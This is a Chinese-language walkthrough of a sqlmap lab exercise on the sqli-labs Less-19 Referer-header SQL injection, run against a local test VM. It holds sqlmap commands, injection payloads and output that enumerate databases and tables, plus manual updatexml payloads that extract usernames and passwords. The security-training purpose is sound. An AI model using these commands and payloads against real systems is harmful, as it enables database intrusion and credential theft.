Sqlmap2021 -- Referer注入

一、检测是否存在注入

1、通过BurpSuite抓包，将封包内容保存到referer.txt

POST /sqli/Less-19/ HTTP/1.1

Host: 192.168.139.129

Content-Length: 38

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.139.129

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.139.129/sqli/Less-19/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=6t4bb3nb4rarqod4j073m038h4

Connection: close

uname=admin&passwd=admin&submit=Submit

2、检测是否存在注入

sqlmap -r /home/aiyou/桌面/referer1.txt --referer " http://192.168.139.129/sqli/Less-19/" --level 3

--level 3:3级以上才会检测请求头信息

运行结果：

parameter 'Referer' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 6329 HTTP(s) requests:

---

Parameter: Referer (Referer)

   Type: boolean-based blind

   Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

   Payload: http://192.168.139.129/sqli/Less-19/' RLIKE (SELECT (CASE WHEN (5183=5183) THEN 0x687474703a2f2f3139322e3136382e3133392e3132392f73716c692f4c6573732d31392f ELSE 0x28 END)) AND 'qIKO'='qIKO

   Type: error-based

   Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)

   Payload: http://192.168.139.129/sqli/Less-19/' AND EXTRACTVALUE(1237,CONCAT(0x5c,0x7171717671,(SELECT (ELT(1237=1237,1))),0x7171787871)) AND 'fmnH'='fmnH

   Type: time-based blind

   Title: MySQL >= 5.0.12 RLIKE time-based blind

   Payload: http://192.168.139.129/sqli/Less-19/' RLIKE SLEEP(5) AND 'JGUO'='JGUO

---

[17:46:44] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.15.11, PHP 5.4.45

back-end DBMS: MySQL >= 5.1

[17:46:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

二、获取数据库名字

qlmap -r /home/aiyou/桌面/referer1.txt --referer " http://192.168.139.129/sqli/Less-19/" --level 3 --dbs

运行结果：

[16:47:27] [INFO] retrieved: pikachu

[16:47:48] [INFO] retrieved:

[16:47:49] [INFO] retrieved: security

[16:48:13] [INFO] retrieved:

[16:48:13] [INFO] retrieved: sys

[16:48:24] [INFO] retrieved:

[16:48:24] [INFO] retrieved: www_dgdg_com

[16:49:13] [INFO] retrieved:

[16:49:14] [INFO] retrieved: www_zm_com

available databases [10]:

[*] challenges

[*] dvwa

[*] information_schema

[*] mysql

[*] performance_schema

[*] pikachu

[*] security

[*] sys

[*] www_dgdg_com

[*] www_zm_com

[16:49:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

三、获取表名

sqlmap -r /home/aiyou/桌面/referer1.txt --referer " http://192.168.139.129/sqli/Less-19/" --level 3 -D security --tables

运行结果：

parameter 'Referer' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 17409 HTTP(s) requests:

---

Parameter: Referer (Referer)

   Type: boolean-based blind

   Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

   Payload: http://192.168.139.129/sqli/Less-19/' RLIKE (SELECT (CASE WHEN (7519=7519) THEN 0x687474703a2f2f3139322e3136382e3133392e3132392f73716c692f4c6573732d31392f ELSE 0x28 END)) AND 'jkuO'='jkuO

   Type: error-based

   Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)

   Payload: http://192.168.139.129/sqli/Less-19/' AND EXTRACTVALUE(6597,CONCAT(0x5c,0x7178627071,(SELECT (ELT(6597=6597,1))),0x7176767071)) AND 'Czdo'='Czdo

   Type: time-based blind

   Title: MySQL >= 5.0.12 RLIKE time-based blind

   Payload: http://192.168.139.129/sqli/Less-19/' RLIKE SLEEP(5) AND 'zQQA'='zQQA

---

[08:54:30] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.1

[08:54:30] [INFO] fetching tables for database: 'security'

[08:54:30] [WARNING] the SQL query provided does not return any output

[08:54:30] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[08:54:30] [WARNING] the SQL query provided does not return any output

[08:54:30] [INFO] fetching number of tables for database 'security'

[08:54:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval                                                        

[08:54:30] [INFO] retrieved: 4

[08:54:30] [INFO] retrieved: emails

[08:54:30] [INFO] retrieved: referers

[08:54:31] [INFO] retrieved: uagents

[08:54:31] [INFO] retrieved: users

Database: security

[4 tables]

+----------+

| emails   |

| referers |

| uagents  |

| users    |

+----------+

[08:54:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'  

四、手动测试

1、sqlmap -r /home/aiyou/桌面/referer1.txt --referer=" http://192.168.139.129/sqli/Less-19/" --level 3  -D security -T users --columns

这里跑不出来了，大家可以继续手动测试一下。。。

2、手动测试获取字段

' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' and table_schema = database() limit 3,1),0x7e),1) and '1'='1

3、手动测试获取字段内容

1' and updatexml(1,concat(0x7e,(select concat_ws('~',username,password) from users limit 0,1),0x7e),1) and '1'='1

禁止非法，后果自负